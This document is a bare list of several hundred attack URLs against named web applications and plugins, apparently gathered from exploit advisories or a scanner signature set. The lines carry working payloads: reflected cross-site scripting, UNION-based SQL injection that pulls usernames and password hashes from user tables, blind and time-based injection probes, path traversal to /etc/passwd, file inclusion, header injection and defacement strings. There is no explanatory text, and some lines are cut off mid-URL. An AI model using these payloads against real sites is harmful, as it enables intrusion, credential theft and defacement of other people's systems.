/cacti/data_input.php?action="><SCRIPT>alert("XSS")</SCRIPT> 
/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e
/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass
/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E 
/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND
/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS] 
/PHP-Nuke-8.0/index.php HTTP/1.0
/ajax/updatecheck.php?PostBackKey=1&ExtensionKey=1&RequestName=1<script>alert(123)</script>
/achievo/index.php?"><script>alert(0)</script>
/achievo/dispatch.php?atknodetype=pim.pim&atkaction=<script>alert(document.cookie)</script>
/modules.php?name=Downloads&d_op=search&query=&#039;&#039;;!--"[script]alert(document.cookie)[/script]
/path/?theme_header=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
/path/?theme_background=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
/path/?theme_elements=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
/path/?logoType=1&logoText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
/path/?logoType=1&sloganText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
/path/?excludeModules=%27;alert(8);%20var%20b=%27
/path/?rightCollapseDefault=%27;alert(8);%20var%20b=%27
/path/?ja_font=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
/webmediaexpl/htdocs/index.php?search=" onmouseover=alert(0) ---
/webmediaexpl/htdocs/?view=2&thisisnotarealcall=&#039;)" onmouseover=alert(0) > ---
/webmediaexpl/htdocs/index.php?dir=&bookmark=" onmouseover=alert(0) > ---&action=edit
/index.php?a=search&q=psstt+securityâ~@~]><a+href%3Dhttp%3A%2F%2Fwebsec.id3as.com>Web-Application-Security 
/MAINT_3_2_0/index.php?db=%22%3E%27%3E%3Cscript%3Ealert%28%2Fr0t%2F%29%3C%2Fscript%3E&token=f70d8ec4305c5a877f56c14554aced10
/horde/passwd/main.php?backend="><script>alert('XSS')</script>&userid=stevejobs&return_to=&oldpassword=foo&newpassword0=foo&newpassword1=foo&submit=Change%20Password 
/index.php?mod=search&action=list&text="'><script>alert('xss')</script>&where=0&submit=Suchen 
/easy_image/main.php?action=detail&id= XSS TO ADD
/phplive/request.php?l=admin&x=1 AND 1=1 
/rating/rate.php?id=1>'><ScRiPt %0A%0D>alert(355414516481)%3B</ScRiPt>
/rating/postcomments.php?id=1>'><ScRiPt %0A%0D>alert(360824593944)%3B</ScRiPt> 
/&z="><script>alert(document.cookie)</script>&f=
/browse_ladies.php?show="><script>alert(document.cookie);</script>
/browse_men.php?show="><script>alert(document.cookie);</script>
/search.php?search=SEARCH&gender="><script>alert(document.cookie);</script>
/services.php?id="><script>alert(document.cookie);</script> 
/xzero_classifieds/?_xzcal_m=6&_xzcal_y=1<body+onload=alert(318724525577)>
/xzero_classifieds/index.php?cityid=1777&view=post&postevent=1"+onmouseover=alert(390684711834)+ 
/public/code/cp_html2txt.php?page=[SHELL] 
/roommate/demo/quick_search.php?part="><script>alert(document.cookie);</script>
/roommate/demo/viewprofile.php?part="><script>alert(document.cookie);</script>
/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]
/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=1 <= TRUE
/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=2 <= FALSE
/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5 => TRUE
/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5 => FALSE
/patch/components/com_aclassf/gmap.php?addr=[XSS]
/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>
/clnt/index.php?ct=manw_repl&md=add_form&replid=11438   and 1=1 <= TRUE
/clnt/index.php?ct=manw_repl&md=add_form&replid=11438   and 1=2 <= FALSE
/clnt/index.php?ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5=> TRUE
/clnt/index.php?ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5=> FALSE
/wap/index.php?md=browse&ct=manw&city=Akron%20OH&page=1<script>alert(317158806252)</script>
/clnt/index.php?ct=evntcl&md=browse&mds=search&adsordtp=vote&city="><script>alert(document.cookie);</script>&page=2
/pro/gmap.php?addr="><script>alert(document.cookie);</script>
/courses_login.php?cat_id=[XSS]
/news_read.php?id=[XSS]
/lessons_login.php?btn=start&cur=[XSS]
/lessons_login.php?id=[XSS] 
/path/index.php?option=com_user&lang=fr&view=[SITE] 
/index.php?option=com_groups&task=list&id=25 and substring(@@version,1,1)=4
/index.php?option=com_groups&task=list&id=25 and substring(@@version,1,1)=5 
/index.php?q="><script>alert(document.cookie);</script> 
/sitebuilder/index.php/"><script>alert(document.cookie);</script>
/sitebuilder/index.php?sitebuilder_id="><script>alert(document.cookie);</script> 
/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code 
/xoops-2.3.3/htdocs/modules/pm/viewpmsg.php?op='"><script>alert('vulnerable')</script>
/xoops-2.3.3/htdocs/modules/profile/user.php?"><script>alert('vulnerable')</script> 
/cat_products.php?cid=[SQL INJ] 
/review/productSearch.html?search=1&amp;action=ProductSearch&amp;q=%3CSCRIPT%2FSRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&amp;vendorId=&amp;categoryId=&amp;submit=Search
/index.php?dispatch=reward_points.userlog&result_ids=pagination_contents&sort_by=timestamp&sort_order=' 
/index.php?do=search&type=&stime=&txtkeyword=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&id=all&button=Search&select2=all&select3=endsoon
/opencms/opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?&homelink=>"&#039;><script>alert("This%20site%20has%20been%20compromised")</script>
/showgallery.php?cat=[nr] and substring(@@version,1,1)=4 <= True
/showgallery.php?cat=[nr] and substring(@@version,1,1)=5 <= False
/showgallery.php?cat=&#039;"><script>alert(&#039;xss&#039;)</script>
/demo/shownews.php/"><script>alert(document.cookie);</script>
/main.php?redirect=<script>alert(&#039;Hadi Kiamarsi&#039;)</script>
/cms-demo/forums.php?category_id=1>"><ScRiPt %0D%0A>alert(522558583855)%3B</ScRiPt>
/cms-demo/forum.php?forum_id=1>"><ScRiPt %0D%0A>alert(522558583855)%3B</ScRiPt>
/cms-demo/forum_topic_new.php?forum_id=1>"><ScRiPt %0D%0A>alert(522558583855)%3B</ScRiPt>
/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members 
/app/function?foo=bar%00<script>alert(document.cookie)</script>
/forum.php?ftid=2&t="><script>alert(document.cookie);</script>
/profile.php?profile_name="><script>alert(document.cookie);</script> 
/view.php?p="><script>alert(document.cookie);</script>
/members.php?sortby[]=A
/messages.php?folder[]=inbox 
/openauto/xml_zone_data.php?filter=1%20union%20select%20concat(0x0a,user,0x3a,pass,0x3a,0x0a)%20from%20users
/openauto/listings.php?min-price=&max_price=&start_zip=BENCHMARK(1000000,MD5(1))&zip_range=10000&state=Illinois&submit=Search&vehicle_type=&make=&model=&year=&listing_condition=&trans=&drive_train=&sellerid= 
/category.php?cat=[code]
/login.php?goto=usercheckout.php&view=[code]
/searchresults.php?page=[code]
/toplistings.php?page=[code]
/viewlisting.php?view=[code]
/viewmember.php?member=[code] 
/auction/index.php?lan=Evilshell 
/index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=lenta&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/metric/?output=%3Cscript%3Ealert(1)%3C/script%3E
/metric/?error=%3Cscript%3Ealert(1)%3C/script%3E
/metric/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E
/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E
/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E
/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E
/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/speed/?output=%3Cscript%3Ealert(1)%3C/script%3E
/speed/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=horoscop&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=horoscop&output=%3Cscript%3Ealert(1)%3C/script%3E
/catphones/index.php?output=%3Cscript%3Ealert(1)%3C/script%3E
/catphones/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E 
/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/ 
/index.php?option=com_pressrelease&id=null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
/index.php?option=com_mediaalert&id=null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
/emaillinks.php?moudi=1"><script>alert(document.cookie);</script> 
/view.php?pagina=1"><script>alert(document.cookie);</script> 
/index.php?option=com_sportfusion&view=teamdetail&cid[0]=-666+union+select+1,2,3,4,5,concat(0x3a,username,password)kaMtiez,7,8,9,10,11,12,13+from+jos_users-- 
/index.php?option=com_facebook&view=student&id=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12+from+jos_users-- 
/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=1-- True
/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=2-- False 
/view_mag.php?mag_id=9+and+substring(@@version,1,1)=5 True
/view_mag.php?mag_id=9+and+substring(@@version,1,1)=4 False
/view_mag.php?mag_id=<script>alert(123)</script> 
/real/view_listing.php?id=4+and+substring(@@version,1,1)=5 True
/real/view_listing.php?id=4+and+substring(@@version,1,1)=4 False 
/search.php?in=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E http
/admin/de/dialog/file_manager.php?w=&p=/../../../../../../../../../../../../../etc/hosts 
/index.php?option=com_cbresumebuilder&task=group_members&group_id=-666+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users-- 
/[path]/customer/home.php?mode=subscribed&email=<plaintext/>
/[path]/customer/home.php?mode=subscribed&email=<script>alert(document.cookie);//<</script>
/[path]/customer/home.php?mode=subscribed&email=<iframe src=http
/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]="><script>alert(&#039;xss&#039;);</script>&atksearchmode[contractnumber]=substring&atksearch[contractname]="><script>alert(&#039;xss&#039;);</script>&atksearchmode[contractname]=substring&atksearch_AE_contracttype[contracttype][=&atksearchmode[contracttype]=exact&atksearch_AE_customer[customer]="><script>alert(&#039;xss&#039;);</script>&atksearchmode[customer]=substring
/index.php?action=loginsortField=poll_default&sortDesc=1&recordsPerPage=1>?><ScRiPt%20%0d%0a>alert(911)%3B</ScRiPt>
/index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20
/index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20
/search.5.html?search=x%27%22%3E%3Cscript%3Ealert(%22redneck%22)%3C/script%3E 
/demo/index.php?view=SearchSong&searchSongKeyword=buurp%22%27%3E%3Cscript%3Ealert(%22BUUURP%21%21%22)%3C/script%3E 
/forum/pop_send_to_friend.asp?url=&lt;/textarea&gt;<img
/tbmnet.php?content=redneck%22%27%3E%3Cscript%3Ealert(/redneck/)%3C/script%3E 
/opendocman/add.php?last_message=<script>alert(1)</script>
/opendocman/toBePublished.php/"><script>alert(1)</script>
/opendocman/toBePublished.php?last_message=<script>alert(1)</script>
/opendocman/index.php?last_message=<script>alert(1)</script>
/opendocman/admin.php?last_message=<script>alert(1)</script>
/opendocman/category.php/"><script>alert(1)</script><"?aku=c3VibWl0PWFkZCZzdGF0ZT0y
/opendocman/department.php/"><script>alert(1)</script><"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI=
/opendocman/profile.php/"><script>alert(1)</script>
/opendocman/rejects.php/"><script>alert(1)</script>
/opendocman/search.php/"><script>alert(1)</script>
/opendocman/user.php/"><script>alert(1)</script><"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI=
/opendocman/user.php?submit=Modify+User&item=2&caller=/opendocman/"><script>alert(123)</script><"
/opendocman/view_file.php/"><script>alert(1)</script><"?aku=aWQ9NiZzdGF0ZT0z
/index.php?stream=text&mod=/../../../../../../../../../../../etc/passwd%00 
/tftgallery/index.php?page=1&album= <script>document.write(document.cookie)</script> 
/tftgallery/settings.php?sample='></link><script>alert('blake XSS test')</script>&name=cucumber%20cool 
/test/cutenews/index.php?lastusername=&#039;%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
/test/cutenews/index.php?mod=%3Cscript%3Ealert(/xss/)%3C/script%3E
/test/cutenews/index.php?mod=editnews&action=list&cat_msg=%3Cscript%3Ealert(/xss/);%3C/script%3E
/test/cutenews/index.php?mod=editnews&action=list&source_msg=%3Cscript%3Ealert(/xss/);%3C/script%3E
/test/cutenews/index.php?mod=editnews&action=list&postponed_selected=%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
/test/cutenews/index.php?mod=editnews&action=list&unapproved_selected=%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
/test/cutenews/index.php?mod=editnews&action=list&news_per_page=%3Cscript%3Ealert(/xss/);%3C/script%3E
/test/cutenews/search.php?dosearch=yes&from_date_day=a&from_date_month=5&from_date_year=2003&to_date_day=4&to_date_month=5&to_date_year=2010
/test/cutenews/search.php?user=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
/test/cutenews/search.php?title=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
/test/cutenews/register.php?result=%3Cscript%3Ealert(/XSS/);%3C/script%3E
/test/cutenews/index.php?mod=addnews&action=addnews
/test/cutenews/index.php?mod=editnews&action=list&source=../users.db.php%00
/test/cutenews/index.php?mod=editnews&action=editnews&id=1255182669&source=../users.db.php%00
/area.php/[code]
/area.php?pagina=[code]
/area.php?sentido=[code]
/area.php?q_registros=[code]
/area.php?orden=[code]
/solic_display.php?pagina=1&q_registros=[code]&orden=seq_solicitud_id
/area_list.php/[code]
/area_list.php?pagina=1&q_registros=0[code]&orden=nombre
/atributo.php/[code]
/atributo_list.php?pagina=1[code]&q_registros=15&orden=activo&sentido
/atributo_list.php?pagina=1&q_registros=15[code]&orden=activo&sentido
/atributo_list.php?pagina=1&q_registros=15&orden=activo[code]&sentido
/atributo_list.php?pagina=1&q_registros=15&orden=activo&sentido[code]
/caso_insert.php/[code] 
/store/index.php?_a=viewProd&productId=22+and+1=2+union+select+version() 
/wp-phplist.php?p=unsubscribe&id=1&unsubscribeemail=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/wp-admin/edit.php?page=mtb_trashbin/trashbin.php&mtb_undelete=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
//websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http
//websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http
/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript
//websecurity.com.ua/uploads/2008/CapCC%20CAPTCHA%20bypass.html" /> <title>CapCC CAPTCHA bypass exploit (C) 2008 MustLive. http
/blog_path/wp-subscription-manager.php?ref=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/blog_path/wp-admin/edit.php?page=subscribe-to-comments.php&ref=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/blog_path/wp-subscription-manager.php?email=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/blog_path/wp-admin/edit.php?page=subscribe-to-comments.php&email=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility
/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E
/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E
/Quick.Cart/demo/admin.php?p=orders-delete&iOrder=2" />
/Quick.Cms/demo_lite/admin.php?p=p-delete&iPage=1"></iframe>
/1";alert(document.cookie);//
/page?";alert(document.cookie);//
/%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/modules/content/index.php?id=-1+UNION+SELECT+1,2,3,@@version,5,6,7,8,9,10,11-- 
/modules/smartmedia/folder.php?categoryid=1>"><ScRiPt>alert(0);</ScRiPt>&folderid=1&start=0 
/includes/feedcreator.class.php?filename=../../../../../../etc/passwd 
/index.php?action=sitemap&lang=en"><script>alert(1)</script>
/index.php?search=hello"><script>alert(document.cookie)</script>&action=search
/index.php?action=artikel&cat=1&id=1&artlang=en&highlight=you"><script>alert(1)</script>
/index.php?action=artikel&cat=1&id=1&artlang=en"><script>alert(1)</script>
/index.php?action=sitemap&letter=W&lang=en"><script>alert(1)</script>
/index.php?action=sitemap&letter=W"><script>alert(1)</script>&lang=en
/index.php?sid=7&lang=en"><script>alert(document.cookie)</script>&action=show&cat=1
/index.php?sid=7&lang=en&action=show&cat=1"><script>alert(document.cookie)</script>
/index.php?action=search&tagging_id=1"><script>alert(1)</script>
/index.php?action=news&newsid=1&newslang=en"><script>alert(document.cookie)</script>
/index.php?action=send2friend&cat=1&id=1&artlang=en"><script>alert(1)</script>
/index.php?action=send2friend&cat=1"><script>alert(1)</script>&id=1&artlang=en
/index.php?action=send2friend&cat=1&id=1"><script>alert(1)</script>&artlang=en
/index.php?action=translate&cat=1&id=1&srclang=en"><script>alert(1)</script>
/index.php?action=translate&cat=1&id=1"><script>alert(1)</script>&srclang=en
/index.php?action=translate&cat=1"><script>alert(1)</script>&id=1&srclang=en
/index.php?action=add&question=1&cat=1"><script>alert(1)</script>
/index.php?action=add&question=1"><script>alert(1)</script>&cat=1 
/wp/?s=</script><script>alert(0)</script>
/wp/?s=");alert(0);document.write("
/search.php?text=%3Cscript%3Ealert(document.cookie)%3C/script%3E&dosearch=Search
/index.php/inicio?yt_color=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(12346)%3B%3C/ScRiPt%3E
/index.php?option=com_content&task=view&id=13&Itemid=47&yt_color=%00&#039;%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E
/path/?created_by_alias=%00'%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E&title=111-222-1933andresg888@gmail.com&text=111-222-1933andresg888@gmail.com&Submit=Submit
/basic_search_result.php?title=<script>alert(/XSS/)</script> 
/index.php?action=showcat&cid=1&sid=[XSS] 
/?pa=[XSS] 
/module.php?mod=[XSS] 
/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;sessid&gt;
/horde-3.3.5/admin/cmdshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;sessid&gt;
/horde-3.3.5/admin/sqlshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;sessid&gt;
/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E 
/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
/[path]/core/admin/auth.php?p=1">
/path/?lang=../path/to/malicious_uploaded_code 
/index.php?option=com_joomportfolio&Itemid=552&task=showcat&catid=1&secid=1/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password),user()/**/from/**/jos_users/**/ 
/mod/poll.php?GLOBALS[nlang]=[LFI%00]
/mod/new.php?GLOBALS[nlang]=[LFI%00] 
/album/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)> 
/index.php?module=[target]&do=View&id="><script>alert();</script>
/index.php?module=[target]&do="><script>alert();</script>
/index.php?module=Account&do=UserInfo&uname="><script>alert();</script>
/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php
/php-calendar-1.1/update08.php?configfile=ftp
/php-calendar-1.1/update08.php?configfile=/etc/passwd 
/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php
/php-calendar-1.1/update10.php?configfile=ftp
/php-calendar-1.1/update10.php?configfile=/etc/passwd 
/myps.php?action=donate&username="/>
/myps.php?action=donate&username=<IMG""">"> 
/[Yol]/index.php?option=com_kif_nexus&controller=[-LFI-]
/modules/mod_joomulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript
/admin/admin/config.php?display=trunks&tech=%3C/script%3E%20%22%3E
/index.php?dbhcms_core_dir=http
/instantgallery/admin.php/>"><ScRiPt>alert(213771818860)</ScRiPt> 
/barbo91_uploads/upload.php?MAX_FILE_SIZE=1024000&UploadedFile=1<script>alert(213771818860)</script>
/barbo91_uploads/upload.php?MAX_FILE_SIZE=1024000&UploadedFile=1<img+src=http
/datingscript/login.php?l=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>
/datingscript/search.php?l=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>
/datingscript/index.php?l=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>
/sm-pmc13/sign_aff.php?pflag=add&name=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&email=indoushka%40example%2Ecom&addr=indoushka@example.com&submit=Submit
/sm-pmc13/admin/indexa.php
/sm-pmc13/admin/addn.php
/wl-ssf41/admin/index.php/index?SID=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
/wl-ssf41/admin/index.php/index?SID=xx
/sm-bc120/recent.php?type=<ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
/sm-bc120/recent.php?type=<img+src=http
/upload/admin/upload.php?amount=<img+src=http
/livehelp/index_offline.php?SERVER=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
/livehelp/frames.php?SERVER=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&URL=www.example.org&SESSION=indoushka@example.org
/sm-p1542/install.php?lang=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
/sm-p1542/index.php?lg=http
/member.php?action=logout&referer=http
/dieselpay/index.php?read=<ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
/dieselpay/index.php?read=../../../../../../../../boot.ini 
/index.php/>[xss] 
/admin/search.php?action=submit&order_id=[xss] 
/upload/admin.php?username=[xss] 
/login.php?url=[xss] 
/Discuz/post.php?action=edit&fid=1&tid=17&pid=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&page=1
/Discuz/misc.php?action=emailfriend&tid=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt> 
/index.php?name=Recommend&stop=<ScRiPt+src=http
/files/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
/wmnews/admin/wmnews.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
/mercuryboard-1.1.5/index.php/>&#039;><ScRiPt>alert(213771818860)</ScRiPt>
/lxr/ident?i=<script>alert('XSS')</script> 
/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=index.php?op=../../../../../../../etc/passwd%00
/Lineage ACM/lineweb_1.0.5/index.php?op=index.php?op=../../../../../../../etc/passwd%00
/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27 
/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123 
/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1 
/cal_config.inc.php?calpath= EVIL SITE??? 
/index.php?option=com_jobads&task=view&type=-999+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+mos_users-- 
/base.php?page=membres.php&mt=[Xss Vuln] 
/phplinks/login.php?email=%F6"+onmouseover=prompt(31337)//&submit=Login&forgotten=1
/jobs/index.php?type=111-222-1933email@address.tst&mode=view&pin_x=0&pin_y=0&post_id=1>">
/index.php?lang=english&skin=&debut=0&seeAdd=1&seeNotes=&seeMess=[XSS-Vuln]
/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971
/test.php/"><script>document.body.innerHTML=&#039;XSS&#039;;</script>
/index.php?id='"><script>alert(document.cookie)</script>
/index.php?id=<marquee><font color=Red size=16>Th3 RDX/font></marquee>
/index.php?id=<HTML><HEAD><TITLE>Redirect...</TITLE><META HTTP-EQUIV="REFRESH" CONTENT="0; URL=http
//serverwww.example.com/blog/search.php?q="><H2>Hacked by Sora</H2>
/index.php?option=com_tienda&task=verproducto&categoria=[XSS] 
/forum.php?action=liste&cat=[Xss Vuln] 
/eng/contacto_demo.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
/forum/liste.php?categorie=1&nbpage=1&nbpageliste=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E 
/index.php?option=com_marketplace&page=show_category&catid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E 
/engine/inc/include/init.php?selected_language=http
/engine/inc/help.php?config[langs]=http
/engine/ajax/pm.php?config[lang_=http
/engine/ajax/addcomments.php?_REQUEST[skin]]=http
/Jokes/joke.php?id=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&listtype=1
/Jokes/results.php?searchingred=<img+src=http
/panier.php?action=ajouter&ref=">
/produit.php?ref=%22%3E%3Cscript%3Ealert%28/xss/.source%29;%3C/script%3E&id_rubrique=1
/rss.php?ref=">&id_rubrique= 
/modules/arcade/index.php?act=play_game&gid=-1+UNION+SELECT+1,2,3,user(),5%23 
/login/?user=foo&pass=bar&failurl=%0D%0ASet-Cookie%3A%20Rec=Sec
/login/?user=foo&pass=bar&failurl=%0D%0AContent-Type
/login/?user=foo&pass=bar&failurl=http
/index.php?q=shopping/neighborhood/45+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
/forum/viewtopic.php?pid=[Xss] 
/modules/mod_3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=&#039;javascript
/bbs/viewthread.php?tid=">><script>alert(HACKED BY FATAL ERROR)</script><marquee><h1>XSS By Fatal Error</h1></marquee> 
/index.php?option=com_rsgallery2&page=inline&id=5&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13+from+jos_users-- 
/index.php?option=com_gambling&Itemid=64&task=showGame&gamblingSid=10&gamblingEvent=[Exploit] 
/administrator/index.php?option=com_autartitarot&task=edit&cid[]=38&controller=[DT] 
/admin/de/colormenu.php?sp=f";[xss];a=" 
/view_post.php?post_id==">><script></script><marquee><h1>XSS By Fatal Error</h1></marquee> 
